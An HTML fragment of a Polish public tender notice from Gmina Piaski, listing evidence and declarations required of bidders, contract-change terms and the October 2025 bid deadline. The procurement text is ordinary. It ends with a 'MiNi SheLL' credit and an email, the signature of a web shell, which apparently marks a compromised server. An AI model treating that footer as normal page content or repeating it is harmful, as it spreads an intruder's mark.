Wykonawca wykaże, że skieruje do realizacji zamówienia:<br/>Część 1-2<br/>Zamawiający nie określa warunku udziału w postępowaniu<br/>w powyższym zakresie.<br/>Wykonawca może w celu potwierdzania spełniania warunków, o których mowa w pkt 4.1.1.4. SWZ, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych.<br/>Uwaga:<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Oświadczenia Wykonawcyo aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 ustawy Pzp, art. 108 ust. 1 pkt 4 ustawy<br/>Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 ustawy Pzp, sporządzonego zgodnie z Załącznikiem nr 9 do SWZ;<br/>- oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę/ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej, sporządzonego zgodnie z Załącznikiem nr 7 do SWZ;<br/>- odpis lub informacji z Krajowego Rejestru Sądowego lub<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>- W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>(1) dokumentów dotyczących każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie, w którym<br/>każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu,<br/>(2) w celu wykazania braku istnienia wobec niego podstaw wykluczenia, podmiotowe środki dowodowe, o których mowa w pkt 4.4.2.2. SWZ składa każdy z Wykonawców.<br/>- Dokumentów dotyczących podmiotu trzeciego, na którego zdolnościach technicznych lub zawodowych polega Wykonawca, w celu<br/>wykazania braku istnienia wobec nich podstaw wykluczenia, wymienionych w pkt 4.4.2.2.1.<br/>i 4.4.2.2.3. SWZ – jeżeli Wykonawca polega na zasobach podmiotu trzeciego.<br/>- Wykonawca zagraniczny<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w pkt 4.4.2.2.3.<br/>SWZ – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju<br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty powinny być<br/>wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Wykaz dostaw wykonanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz<br/>z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie (w celu potwierdzenia spełniania warunku określonego w pkt<br/>4.1.1.4.1. SWZ), sporządzonego zgodnie z załącznikiem nr 10 do SWZ – dotyczy części 1-2.<br/>Dowodami potwierdzającymi czy dostawy zostały wykonane należycie są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia, dokumenty oraz pełnomocnictwa składane wraz z ofertą za pośrednictwem Platformy zakupowej:<br/>- aktualne na dzień składania ofert oświadczenie wstępne, składane na podstawie art. 125 ust 1 ustawy Pzp, w zakresie wskazanym w Załączniku<br/>nr 4 do SWZ. Informacje zawarte w oświadczeniu będą stanowiły wstępne<br/>potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu.<br/>- w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców<br/>oświadczenie wstępne, o których mowa w pkt 4.4.1.1. SWZ składa każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to<br/>ma potwierdzać spełnianie warunków udziału w postępowaniu w zakresie,<br/>w którym każdy z Wykonawców wykazuje spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw wykluczenia. Zasady dotyczące składania oświadczenia wstępnego określone w pkt 4.4.1.1. SWZ stosuje się;<br/>- Wykonawca, który powołuje się na zasoby innych podmiotów, w celu<br/>wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania,<br/>w zakresie w jakim powołuje się na ich zasoby, warunków udziału<br/>w postępowaniu, składa oświadczenia wstępne, w zakresie wskazanym<br/>w Załączniku nr 5 do SWZ, dotyczące tych podmiotów. Zasady dotyczące<br/>składania oraz formy oświadczeń określone w pkt 4.4.1.1.1.- 4.4.1.1.3. SWZ<br/>stosuje się;<br/>- zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia<br/>(sporządzone zgodnie z Załącznikiem nr 8 do SWZ) lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów - jeżeli<br/>Wykonawca polega na zasobach podmiotu trzeciego;<br/>- w przypadku, gdy Wykonawcę reprezentuje pełnomocnik – pełnomocnictwo określające jego zakres, podpisane przez<br/>osobę/y upoważnione do reprezentacji wskazane we właściwym rejestrze, z którego wynika prawo do podpisania oferty oraz do podpisania innych dokumentów składanych wraz z ofertą.<br/>- w przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie<br/>o udzielenie zamówienia, pełnomocnictwo określające zakres umocowania<br/>pełnomocnika ustanowionego do reprezentowania ich w postępowaniu.<br/>- oświadczenie o zastrzeżeniu informacji - stanowiące Załącznik nr 6 do SWZ – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> - Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>- W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie przesłanek określonych w pkt 4.2.1. SWZ, natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 4.1. SWZ.<br/>Powyższe dotyczy również spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wprowadzenie jakichkolwiek zmian do niniejszej umowy możliwe jest tylko w granicach określonych w art. 455 Ustawy Prawo Zamówień Publicznych.<br/>3. Zamawiający działając na podstawie art. 455 ust. 1 pkt. 1 Ustawy Prawo Zamówień Publicznych, przewiduje możliwość dokonania m. in. następujących zmian w Umowie:<br/>1) dopuszcza się zmianę terminu wykonania Umowy, o którym mowa w § 2. Termin realizacji Przedmiotu Umowy może ulec<br/>przesunięciu:<br/>a) w przypadku działania siły wyższej (katastrofalne działania przyrody - np. mrozy, śnieżyce, powodzie; akty władzy<br/>ustawodawczej lub wykonawczej - oraz niektóre zaburzenia życia zbiorowego np. zamieszki uliczne, akty terroru, epidemie)<br/>mającej bezpośredni wpływ na termin wykonania zamówienia; termin realizacji będzie przesunięty o czas działania siły<br/>wyższej oraz czas niezbędny na usunięcie skutków działania tej siły, zmiana terminu realizacji nie będzie powodowała<br/>zwiększania wynagrodzenia Wykonawcy,<br/>b) jeżeli opóźnieniu ulegnie wykonanie prac niezbędnych do realizacji Umowy, do których wykonania zobowiązany jest<br/>Zamawiający, termin realizacji będzie przesunięty o czas niezbędny do wykonania przez Zamawiającego przedmiotowych<br/>prac, zmiana terminu realizacji nie będzie powodowała zwiększania wynagrodzenia Wykonawcy;<br/>c) jeśli podczas wykonywania prac okaże się, że konieczne do wykonania są czynności dodatkowe (których nie można było<br/>przewidzieć), od których wykonania uzależnione jest wykonanie prac podstawowych - termin realizacji może być przesunięty<br/>o czas niezbędny do wykonania tych czynności,<br/>d) w przypadku wystąpienia okoliczności, których przyczyny leżą po stronie Zamawiającego (w szczególności<br/>uniemożliwienie rozpoczęcia realizacji prac lub wstrzymanie prac przez Zamawiającego) – termin realizacji może być<br/>przesunięty o czas niezbędny do wykonania opóźnionych prac,<br/>e) w przypadku napotkania przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i<br/>niezależnych od nich, np. wystąpienia zjawisk związanych z działaniami osób trzecich uniemożliwiających wykonywanie<br/>prac, zmian przepisów prawa polskiego albo prawa wspólnotowego, a będzie to miało wpływ na terminowe zakończenie<br/>realizacji Przedmiotu Umowy - termin realizacji może zostać przesunięty o czas, kiedy realizacja zamówienia była<br/>niemożliwa z przyczyn nie leżących po stronie Wykonawcy,<br/>Szczegółowy wykaz zmian zawiera par. 10 projektowanych postanowień umowy stanowiących załącznik nr 11 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_piaski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-02 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com